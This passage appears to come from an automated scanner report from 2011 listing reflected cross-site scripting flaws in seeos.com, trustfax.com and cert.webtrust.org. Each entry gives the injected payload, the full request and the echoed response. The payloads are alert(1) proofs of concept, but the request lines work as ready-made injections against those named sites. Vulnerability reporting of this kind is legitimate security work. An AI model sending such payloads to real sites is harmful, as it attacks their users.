Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.seeos.com/?f
Cookie: uid=89d07%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E77e368347ea

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:14:19 GMT
Server: Apache/2.2.17 (Ubuntu)
X-Powered-By: PHP/5.3.5-1ubuntu7.2
Vary: Accept-Encoding
Content-Length: 1713
Connection: close
Content-Type: text/html

<html>
<head>

<script type='text/javascript'><!--//<![CDATA[
function pop_ax() {
   if (--pop_cnt==0) {
       return;
   }
   var x=setTimeout('pop_ax()',750);
   var o=window.document.getElementById('p
...[SNIP]...
<im'+'g src="/track.php?uid=8/4af94';alert(1)//b211e4f043c9d07&d=seeos.com&sr='+sr+'" width=1 height=1>
...[SNIP]...

1.30. http://www.seeos.com/tg.php [uid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.seeos.com
Path:	/tg.php

Issue detail

The value of the uid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4bc55'%3balert(1)//f9ffbc10fbd was submitted in the uid parameter. This input was echoed as 4bc55';alert(1)//f9ffbc10fbd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /tg.php?uid=www4e75df0eb30884.963191084bc55'%3balert(1)//f9ffbc10fbd&src=&cat=travel&kw=See+OS&sc=travel HTTP/1.1
Host: www.seeos.com
Proxy-Connection: keep-alive
Referer: http://www.seeos.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=www4e75df0eb30884.96319108

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:07:47 GMT
Server: Apache/2.2.17 (Ubuntu)
X-Powered-By: PHP/5.3.5-1ubuntu7.2
Vary: Accept-Encoding
Content-Length: 1750
Connection: close
Content-Type: text/html

<html>
<head>

<script type='text/javascript'><!--//<![CDATA[
function pop_ax() {
   if (--pop_cnt==0) {
       return;
   }
   var x=setTimeout('pop_ax()',750);
   var o=window.document.getElementById('p
...[SNIP]...
<im'+'g src="/track.php?uid=www4e75df0eb30884.963191084bc55';alert(1)//f9ffbc10fbd&d=seeos.com&sr='+sr+'" width=1 height=1>
...[SNIP]...

1.31. http://www.trustfax.com/Privacy.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.trustfax.com
Path:	/Privacy.html

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload e4364--><img%20src%3da%20onerror%3dalert(1)>86fda6cabfd was submitted in the REST URL parameter 1. This input was echoed as e4364--><img src=a onerror=alert(1)>86fda6cabfd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /Privacy.htmle4364--><img%20src%3da%20onerror%3dalert(1)>86fda6cabfd HTTP/1.1
Host: www.trustfax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:07:39 GMT
Server: Apache
X-Magnolia-Registration: Registered
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 18 Sep 2011 12:07:39 GMT
Content-Length: 31442
X-TWA-Web: pa:28192
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<img src=a onerror=alert(1)>86fda6cabfd.3f5171393f3f7e3f313f03633f413f3f
(SSL-Detected=, akamaiCountry=US)"
nodename = "Privacy"
template = "trustfaxLeftSidebar"
timestamp = "2011-09-18 05:07:40.000"
-->
...[SNIP]...

1.32. http://www.trustfax.com/about.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.trustfax.com
Path:	/about.html

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 6ca76--><img%20src%3da%20onerror%3dalert(1)>93deddcf36 was submitted in the REST URL parameter 1. This input was echoed as 6ca76--><img src=a onerror=alert(1)>93deddcf36 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /about.html6ca76--><img%20src%3da%20onerror%3dalert(1)>93deddcf36 HTTP/1.1
Host: www.trustfax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:07:38 GMT
Server: Apache
X-Magnolia-Registration: Registered
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 18 Sep 2011 12:07:38 GMT
Content-Length: 9643
X-TWA-Web: pa:28192
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
ug Info
id = "TPA2T10"
skin = ""
title = "About TrustFax - Online Internet Fax Broadcasting Service Provider"
handle = "/trustfax/content/about"
cache key = "/trustfax/content/about.html6ca76--><img src=a onerror=alert(1)>93deddcf36.3f5171393f3f7e3f313f03633f413f3f
(SSL-Detected=, akamaiCountry=US)"
nodename = "about"
template = "trustfaxLeftSidebar"
timestamp = "2011-09-18 05:07:38.577"
-->
...[SNIP]...

1.33. http://www.trustfax.com/contact.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.trustfax.com
Path:	/contact.html

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload d331f--><img%20src%3da%20onerror%3dalert(1)>e7dbabbc8ec was submitted in the REST URL parameter 1. This input was echoed as d331f--><img src=a onerror=alert(1)>e7dbabbc8ec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /contact.htmld331f--><img%20src%3da%20onerror%3dalert(1)>e7dbabbc8ec HTTP/1.1
Host: www.trustfax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:07:38 GMT
Server: Apache
X-Magnolia-Registration: Registered
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 18 Sep 2011 12:07:38 GMT
Content-Length: 9408
X-TWA-Web: pa:28192
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...

id = "TPA2T10"
skin = ""
title = "Contact TrustFax for World's Best Secure Online Internet Fax Services"
handle = "/trustfax/content/contact"
cache key = "/trustfax/content/contact.htmld331f--><img src=a onerror=alert(1)>e7dbabbc8ec.3f5171393f3f7e3f313f03633f413f3f
(SSL-Detected=, akamaiCountry=US)"
nodename = "contact"
template = "trustfaxLeftSidebar"
timestamp = "2011-09-18 05:07:38.243"
-->
...[SNIP]...

1.34. http://www.trustfax.com/features.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.trustfax.com
Path:	/features.html

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 7cb6c--><img%20src%3da%20onerror%3dalert(1)>3896b8c5ad8 was submitted in the REST URL parameter 1. This input was echoed as 7cb6c--><img src=a onerror=alert(1)>3896b8c5ad8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /features.html7cb6c--><img%20src%3da%20onerror%3dalert(1)>3896b8c5ad8 HTTP/1.1
Host: www.trustfax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:07:37 GMT
Server: Apache
X-Magnolia-Registration: Registered
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 18 Sep 2011 12:07:37 GMT
Content-Length: 14078
X-TWA-Web: pb:28192
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<img src=a onerror=alert(1)>3896b8c5ad8.3f5171393f3f7e3f313f03633f413f3f
(SSL-Detected=, akamaiCountry=US)"
nodename = "features"
template = "trustfaxLeftSidebar"
timestamp = "2011-09-18 05:07:37.953"
-->
...[SNIP]...

1.35. http://www.trustfax.com/free_trial_30day.asp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.trustfax.com
Path:	/free_trial_30day.asp

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 14b79--><img%20src%3da%20onerror%3dalert(1)>f83294ee387 was submitted in the REST URL parameter 1. This input was echoed as 14b79--><img src=a onerror=alert(1)>f83294ee387 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /free_trial_30day.asp14b79--><img%20src%3da%20onerror%3dalert(1)>f83294ee387 HTTP/1.1
Host: www.trustfax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:07:40 GMT
Server: Apache
X-Magnolia-Registration: Registered
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 18 Sep 2011 12:07:40 GMT
Content-Length: 11488
X-TWA-Web: pa:28192
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
o
id = "TPA2T10"
skin = ""
title = "Free Fax Software Online Fax Services from TrustFax"
handle = "/trustfax/content/free_trial_30day"
cache key = "/trustfax/content/free_trial_30day.asp14b79--><img src=a onerror=alert(1)>f83294ee387.3f5171393f3f7e3f313f03633f413f3f
(SSL-Detected=, akamaiCountry=US)"
nodename = "free_trial_30day"
template = "trustfaxLeftSidebar"
timestamp = "2011-09-18 05:07:40.444"
-->
...[SNIP]...

1.36. http://www.trustfax.com/free_trial_30day.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.trustfax.com
Path:	/free_trial_30day.html

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload deafa--><img%20src%3da%20onerror%3dalert(1)>0746bfa8dd5 was submitted in the REST URL parameter 1. This input was echoed as deafa--><img src=a onerror=alert(1)>0746bfa8dd5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /free_trial_30day.htmldeafa--><img%20src%3da%20onerror%3dalert(1)>0746bfa8dd5 HTTP/1.1
Host: www.trustfax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:07:37 GMT
Server: Apache
X-Magnolia-Registration: Registered
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 18 Sep 2011 12:07:37 GMT
Content-Length: 11489
X-TWA-Web: pa:28192
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...

id = "TPA2T10"
skin = ""
title = "Free Fax Software Online Fax Services from TrustFax"
handle = "/trustfax/content/free_trial_30day"
cache key = "/trustfax/content/free_trial_30day.htmldeafa--><img src=a onerror=alert(1)>0746bfa8dd5.3f5171393f3f7e3f313f03633f413f3f
(SSL-Detected=, akamaiCountry=US)"
nodename = "free_trial_30day"
template = "trustfaxLeftSidebar"
timestamp = "2011-09-18 05:07:37.691"
-->
...[SNIP]...

1.37. http://www.trustfax.com/legalandpatent.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.trustfax.com
Path:	/legalandpatent.html

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload c4dc4--><img%20src%3da%20onerror%3dalert(1)>d6fa8f84920 was submitted in the REST URL parameter 1. This input was echoed as c4dc4--><img src=a onerror=alert(1)>d6fa8f84920 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /legalandpatent.htmlc4dc4--><img%20src%3da%20onerror%3dalert(1)>d6fa8f84920 HTTP/1.1
Host: www.trustfax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:07:39 GMT
Server: Apache
X-Magnolia-Registration: Registered
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 18 Sep 2011 12:07:39 GMT
Content-Length: 15556
X-TWA-Web: pa:28192
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<img src=a onerror=alert(1)>d6fa8f84920.3f5171393f3f7e3f313f03633f413f3f
(SSL-Detected=, akamaiCountry=US)"
nodename = "legalandpatent"
template = "trustfaxLeftSidebar"
timestamp = "2011-09-18 05:07:39.740"
-->
...[SNIP]...

1.38. http://www.trustfax.com/login.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.trustfax.com
Path:	/login.html

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 679b7--><img%20src%3da%20onerror%3dalert(1)>4828928eded was submitted in the REST URL parameter 1. This input was echoed as 679b7--><img src=a onerror=alert(1)>4828928eded in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /login.html679b7--><img%20src%3da%20onerror%3dalert(1)>4828928eded HTTP/1.1
Host: www.trustfax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:07:39 GMT
Server: Apache
X-Magnolia-Registration: Registered
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 18 Sep 2011 12:07:39 GMT
Content-Length: 9382
X-TWA-Web: pb:28192
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<img src=a onerror=alert(1)>4828928eded.3f5171393f3f7e3f313f03633f413f3f
(SSL-Detected=, akamaiCountry=US)"
nodename = "login"
template = "trustfaxLeftSidebar"
timestamp = "2011-09-18 05:07:39.069"
-->
...[SNIP]...

1.39. http://www.trustfax.com/pricing.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.trustfax.com
Path:	/pricing.html

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload af10d--><img%20src%3da%20onerror%3dalert(1)>0bedec460c4 was submitted in the REST URL parameter 1. This input was echoed as af10d--><img src=a onerror=alert(1)>0bedec460c4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /pricing.htmlaf10d--><img%20src%3da%20onerror%3dalert(1)>0bedec460c4 HTTP/1.1
Host: www.trustfax.com
Proxy-Connection: keep-alive
Referer: http://www.trustfax.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AKAINFO="client=eozbczabczaof//areacode=408//city=SANJOSE//state=CA//country=US//region=NA//bandwidth=vhigh//timezone=PST//version=3"; mbox=check#true#1316364145|session#1316364084200-226831#1316365945|PC#1316364084200-226831.19#1318178486; s_cc=true; s_ev4=%5B%5B%27www.vengine.com%27%2C%271316364087271%27%5D%5D; s_ev5=%5B%5B%27Referrers%27%2C%271316364087272%27%5D%5D; c_m=undefinedwww.vengine.comwww.vengine.com; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:43:29 GMT
Server: Apache
X-Magnolia-Registration: Registered
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 18 Sep 2011 11:43:29 GMT
Vary: Accept-Encoding
Content-Length: 10897
X-TWA-Web: pb:28192
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<img src=a onerror=alert(1)>0bedec460c4.3f5171393f3f7e3f313f03633f413f3f
(SSL-Detected=, akamaiCountry=US)"
nodename = "pricing"
template = "trustfaxLeftSidebar"
timestamp = "2011-09-18 04:43:29.983"
-->
...[SNIP]...

1.40. http://www.trustfax.com/sitemap.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.trustfax.com
Path:	/sitemap.html

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 4ee13--><img%20src%3da%20onerror%3dalert(1)>ade44186370 was submitted in the REST URL parameter 1. This input was echoed as 4ee13--><img src=a onerror=alert(1)>ade44186370 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /sitemap.html4ee13--><img%20src%3da%20onerror%3dalert(1)>ade44186370 HTTP/1.1
Host: www.trustfax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:07:39 GMT
Server: Apache
X-Magnolia-Registration: Registered
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 18 Sep 2011 12:07:39 GMT
Content-Length: 9686
X-TWA-Web: pb:28192
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<img src=a onerror=alert(1)>ade44186370.3f5171393f3f7e3f313f03633f413f3f
(SSL-Detected=, akamaiCountry=US)"
nodename = "sitemap"
template = "trustfaxLeftSidebar"
timestamp = "2011-09-18 05:07:39.989"
-->
...[SNIP]...

1.41. http://www.trustfax.com/support.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.trustfax.com
Path:	/support.html

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload d2114--><img%20src%3da%20onerror%3dalert(1)>7075d3b5727 was submitted in the REST URL parameter 1. This input was echoed as d2114--><img src=a onerror=alert(1)>7075d3b5727 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /support.htmld2114--><img%20src%3da%20onerror%3dalert(1)>7075d3b5727 HTTP/1.1
Host: www.trustfax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:07:38 GMT
Server: Apache
X-Magnolia-Registration: Registered
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 18 Sep 2011 12:07:38 GMT
Content-Length: 28666
X-TWA-Web: pb:28192
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<img src=a onerror=alert(1)>7075d3b5727.3f5171393f3f7e3f313f03633f413f3f
(SSL-Detected=, akamaiCountry=US)"
nodename = "support"
template = "trustfaxLeftSidebar"
timestamp = "2011-09-18 05:07:38.941"
-->
...[SNIP]...

1.42. http://www.trustfax.com/termsandconditions.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.trustfax.com
Path:	/termsandconditions.html

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 874a7--><img%20src%3da%20onerror%3dalert(1)>4adc5ca8d09 was submitted in the REST URL parameter 1. This input was echoed as 874a7--><img src=a onerror=alert(1)>4adc5ca8d09 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /termsandconditions.html874a7--><img%20src%3da%20onerror%3dalert(1)>4adc5ca8d09 HTTP/1.1
Host: www.trustfax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:07:40 GMT
Server: Apache
X-Magnolia-Registration: Registered
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 18 Sep 2011 12:07:40 GMT
Content-Length: 58156
X-TWA-Web: pb:28192
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<img src=a onerror=alert(1)>4adc5ca8d09.3f5171393f3f7e3f313f03633f413f3f
(SSL-Detected=, akamaiCountry=US)"
nodename = "termsandconditions"
template = "trustfaxLeftSidebar"
timestamp = "2011-09-18 05:07:40.678"
-->
...[SNIP]...

1.43. http://www.trustfax.com/whytrustfax.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.trustfax.com
Path:	/whytrustfax.html

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload dd3bd--><img%20src%3da%20onerror%3dalert(1)>45b34d72443 was submitted in the REST URL parameter 1. This input was echoed as dd3bd--><img src=a onerror=alert(1)>45b34d72443 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /whytrustfax.htmldd3bd--><img%20src%3da%20onerror%3dalert(1)>45b34d72443 HTTP/1.1
Host: www.trustfax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:07:38 GMT
Server: Apache
X-Magnolia-Registration: Registered
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 18 Sep 2011 12:07:38 GMT
Content-Length: 10972
X-TWA-Web: pa:28192
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<img src=a onerror=alert(1)>45b34d72443.3f5171393f3f7e3f313f03633f413f3f
(SSL-Detected=, akamaiCountry=US)"
nodename = "whytrustfax"
template = "trustfaxLeftSidebar"
timestamp = "2011-09-18 05:07:38.940"
-->
...[SNIP]...

1.44. https://cert.webtrust.org/ViewSeal [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://cert.webtrust.org
Path:	/ViewSeal

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload e739f<script>alert(1)</script>4647f9dbaca was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /ViewSeal?id=1082 HTTP/1.1
Host: cert.webtrust.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=e739f<script>alert(1)</script>4647f9dbaca

Response

HTTP/1.1 200 OK
